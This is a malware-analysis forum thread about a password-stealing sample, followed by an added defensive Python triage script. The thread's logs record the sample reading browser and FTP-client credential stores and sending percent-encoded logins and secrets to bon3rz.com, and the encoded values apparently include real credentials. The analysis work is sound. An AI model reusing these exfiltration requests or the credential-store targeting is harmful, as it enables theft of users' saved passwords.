A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1259  by Jaxryley
 Thu Jun 10, 2010 12:16 am
BSA:
Detailed report of suspicious malware actions:

Detected backdoor listening on port: 0
Detected process privilege elevation
Internet connection: C:\Users\Administrator\Desktop\BindmeWEB.exe Connects to "91.207.192.69" on port 80 (TCP - HTTP).
Listed all entry names in a remote access phone book
Opened a service named: RASMAN
Opened a service named: Sens
Query DNS: bon3rz.com

Risk evaluation result: High
Result: 7/41 (17.08%) - Win32:Dracur-D
http://www.virustotal.com/analisis/d376 ... 1276128023
 #1261  by gjf
 Thu Jun 10, 2010 10:49 am
Code:
.........
CreateMutex(Local\_!MSFTHISTORY!_) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!local settings!temporary internet files!content.ie5!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\index.dat) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!cookies!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Cookies\index.dat) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!local settings!history!history.ie5!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Local Settings\History\History.IE5\index.dat) [d:\bindmeweb.exe]
........
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%63%68%72%6F%6D%65%3A%2F%2F%73%78%69%70%70%65%72%2F%61%63%63%6F%75%6E%74&l=%31%33%66%34%63%35%39%37%2D%65%31%34%37%2D%34%62%64%62%2D%39%66%31%33%2D%37%32%61%61%38%37%63%30%31%30%39%38&p=%70%4C%4B%67%37%6F%6B%36%57%79%73%56%45%6F%4E%35%48%33%69%53%71%6B%49%72%59%34%79%59%69%45%41%4F&c=%53%52)
........
InternetConnect(bon3rz.com) [d:\bindmeweb.exe]
HttpOpenRequest(/final/index.php?action=add&a=10&u=%63%68%72%6F%6D%65%3A%2F%2F%73%78%69%70%70%65%72%2F%61%63%63%6F%75%6E%74&l=%31%33%66%34%63%35%39%37%2D%65%31%34%37%2D%34%62%64%62%2D%39%66%31%33%2D%37%32%61%61%38%37%63%30%31%30%39%38&p=%70%4C%4B%67%37%6F%6B%36%57%79%73%56%45%6F%4E%35%48%33%69%53%71%6B%49%72%59%34%79%59%69%45%41%4F&c=%53%52) 
........
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%73%79%6E%63%2E%78%6D%61%72%6B%73%2E%63%6F%6D%20%28%58%6D%61%72%6B%73%20%53%79%6E%63%20%4C%6F%67%69%6E%29&l=%67%6A%66&p=%7B%61%74%74%21%49%4C%41%7D&c=%53%52) [d:\bindmeweb.exe]
HttpOpenRequest(/final/index.php?action=add&a=10&u=%73%79%6E%63%2E%78%6D%61%72%6B%73%2E%63%6F%6D%20%28%58%6D%61%72%6B%73%20%53%79%6E%63%20%4C%6F%67%69%6E%29&l=%67%6A%66&p=%7B%61%74%74%21%49%4C%41%7D&c=%53%52) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\z65hwjfj.Fixxxer\signons.sqlite) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2) [d:\bindmeweb.exe]
Copy(C:\Documents and Settings\Администратор\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data->C:\Documents and Settings\Администратор\Application Data\chrtmp) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Application Data\chrtmp) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\DownloadManager\Passwords) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\SmartFTP\Client 2.0\Settings\History\Items) [d:\bindmeweb.exe]
And then it shuts down. Pass stealer?
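Decoding what the sample actually sends, as an added example (not part of either post above and not the malware's own code): a small Python triage script run over a constructed subset of the API-monitor lines quoted in the previous post. It labels the accesses to known browser and FTP-client credential stores and percent-decodes the bon3rz.com query string. Reading the u=, l= and p= fields as site/origin, login and password is an inference from the decoded values, and the store labels are assumptions about what each path or key holds; the script reports the p= value only by its length so no secret is printed in clear.

```python
"""Triage helper for an API-monitor log like the one quoted above (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a subset of the lines quoted in the post, unchanged.
SAMPLE_LOG = r"""
CreateFile(C:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\index.dat) [d:\bindmeweb.exe]
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%63%68%72%6F%6D%65%3A%2F%2F%73%78%69%70%70%65%72%2F%61%63%63%6F%75%6E%74&l=%31%33%66%34%63%35%39%37%2D%65%31%34%37%2D%34%62%64%62%2D%39%66%31%33%2D%37%32%61%61%38%37%63%30%31%30%39%38&p=%70%4C%4B%67%37%6F%6B%36%57%79%73%56%45%6F%4E%35%48%33%69%53%71%6B%49%72%59%34%79%59%69%45%41%4F&c=%53%52)
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%73%79%6E%63%2E%78%6D%61%72%6B%73%2E%63%6F%6D%20%28%58%6D%61%72%6B%73%20%53%79%6E%63%20%4C%6F%67%69%6E%29&l=%67%6A%66&p=%7B%61%74%74%21%49%4C%41%7D&c=%53%52) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\z65hwjfj.Fixxxer\signons.sqlite) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2) [d:\bindmeweb.exe]
Copy(C:\Documents and Settings\Администратор\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data->C:\Documents and Settings\Администратор\Application Data\chrtmp) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\DownloadManager\Passwords) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\SmartFTP\Client 2.0\Settings\History\Items) [d:\bindmeweb.exe]
"""

# Assumed labels: what each path / registry key is known to hold.
CREDENTIAL_STORES = [
    ("signons.sqlite", "Firefox saved logins"),
    (r"intelliforms\storage2", "IE AutoComplete passwords"),
    (r"chrome\user data\default\web data", "Chrome form/login data"),
    (r"downloadmanager\passwords", "Internet Download Manager passwords"),
    (r"smartftp\client 2.0\settings\history", "SmartFTP connection history"),
    ("content.ie5", "IE cache index (index.dat)"),
]

# Log line shape: Api(argument) followed by zero or more [module] tags.
LINE_RE = re.compile(r"^(?P<api>\w+)\((?P<arg>.*)\)(?:\s*\[[^\]]*\])*\s*$")


def parse_line(line):
    """Split one monitor line into (api, argument); None if it does not match."""
    m = LINE_RE.match(line.strip())
    return (m.group("api"), m.group("arg")) if m else None


def credential_store(arg):
    """Return the assumed store label for a path/key argument, or None."""
    low = arg.lower()
    for needle, label in CREDENTIAL_STORES:
        if needle in low:
            return label
    return None


def decode_exfil(url):
    """Percent-decode one action=add report; None for URLs of another shape."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("action") != ["add"] or "p" not in q:
        return None
    return {
        "host": parts.hostname,
        "site": q.get("u", [""])[0],       # inferred: site / origin of the credential
        "login": q.get("l", [""])[0],      # inferred: login name
        "password_len": len(q["p"][0]),   # inferred: the secret; only its length is kept
        "c": q.get("c", [""])[0],          # meaning unknown
    }


def triage(log):
    """Collect credential-store touches and decoded exfil records from a log."""
    stores, exfil = [], []
    for line in log.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        api, arg = parsed
        label = credential_store(arg)
        if label:
            stores.append((api, label))
        if api == "InternetOpenURL":
            rec = decode_exfil(arg)
            if rec:
                exfil.append(rec)
    return {"stores": stores, "exfil": exfil}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for api, label in result["stores"]:
        print(f"{api:<13} -> {label}")
    for rec in result["exfil"]:
        print(f"exfil to {rec['host']}: site={rec['site']!r} login={rec['login']!r} "
              f"password={rec['password_len']} chars c={rec['c']!r}")
```

Run as-is it lists six credential-store accesses and two reports to bon3rz.com: one for a chrome:// origin with a UUID-shaped login and a 32-character secret, one for sync.xmarks.com with the poster's login and a 9-character secret. HttpOpenRequest lines carry the same query string without a scheme, so only InternetOpenURL is decoded to avoid counting each report twice.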